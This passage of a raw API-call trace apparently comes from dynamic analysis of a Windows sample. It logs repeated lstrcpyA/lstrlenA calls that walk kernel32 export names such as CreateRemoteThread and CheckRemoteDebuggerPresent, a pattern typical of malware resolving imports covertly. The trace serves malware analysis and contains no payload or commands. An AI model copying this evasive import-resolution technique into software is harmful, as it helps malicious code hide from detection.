[0080.706] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.706] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.706] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.706] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.706] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.706] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.706] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.706] lstrlenA (lpString="CANCELIO") returned 8 [0080.706] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.707] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.707] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.707] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.707] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.707] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.707] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.707] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.707] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.707] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.707] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.707] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.707] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.707] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.707] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.707] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.707] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.707] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.707] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.707] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.708] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.708] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.708] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.708] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.708] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.708] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.708] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.708] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.708] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.708] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.708] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.708] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.708] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.708] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.708] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.708] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.708] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.708] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.708] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.709] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.709] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.709] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.709] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.709] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.709] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.709] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.709] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.709] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.709] lstrlenA (lpString="COPYFILEA") returned 9 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.709] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.709] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.709] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.709] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.709] lstrlenA (lpString="COPYFILEW") returned 9 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.709] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.709] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.709] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.709] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.710] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.710] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.710] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.710] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.710] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.710] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.710] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.710] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.710] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.710] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.710] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.710] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.710] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.710] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.710] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.710] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.710] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.710] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.710] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.710] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.711] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.711] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.711] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.711] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.711] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.711] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.711] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.711] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.711] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.711] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.711] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.711] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.711] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.712] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.712] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.712] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.712] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.712] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.712] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.712] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.712] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.712] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.712] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.712] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.712] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.712] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.712] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.712] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.712] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.712] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.712] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.712] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.713] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.713] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.713] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.713] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.713] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.713] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.713] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.713] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.713] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.713] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.713] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.713] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.713] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.713] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.713] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.713] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.713] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.713] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.713] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.713] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueueTimer" | out: 